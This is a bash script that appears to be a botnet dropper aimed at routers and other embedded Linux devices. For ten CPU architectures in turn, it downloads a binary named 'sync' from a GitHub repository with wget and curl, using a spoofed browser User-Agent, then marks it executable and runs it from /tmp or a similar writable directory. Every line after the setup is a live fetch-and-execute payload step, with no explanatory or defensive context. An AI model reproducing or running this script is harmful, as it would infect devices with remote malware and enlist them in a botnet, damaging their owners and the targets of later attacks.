#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.x86; curl -L -o sync.x86 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.x86; cat sync.x86 >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mips; curl -L -o sync.mips -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mips; cat sync.mips >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mipsel; curl -L -o sync.mipsel -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mipsel; cat sync.mipsel >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm4; curl -L -o sync.arm4 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm4; cat sync.arm4 >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm5; curl -L -o sync.arm5 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm5; cat sync.arm5 >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm6; curl -L -o sync.arm6 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm6; cat sync.arm6 >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm7; curl -L -o sync.arm7 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm7; cat sync.arm7 >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.powerpc; curl -L -o sync.powerpc -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.powerpc; cat sync.powerpc >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.m68k; curl -L -o sync.m68k -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.m68k; cat sync.m68k >sync; chmod +x *; ./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.sh4; curl -L -o sync.sh4 -H "User-Agent: Mozilla/5.0" https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.sh4; cat sync.sh4 >sync; chmod +x *; ./sync
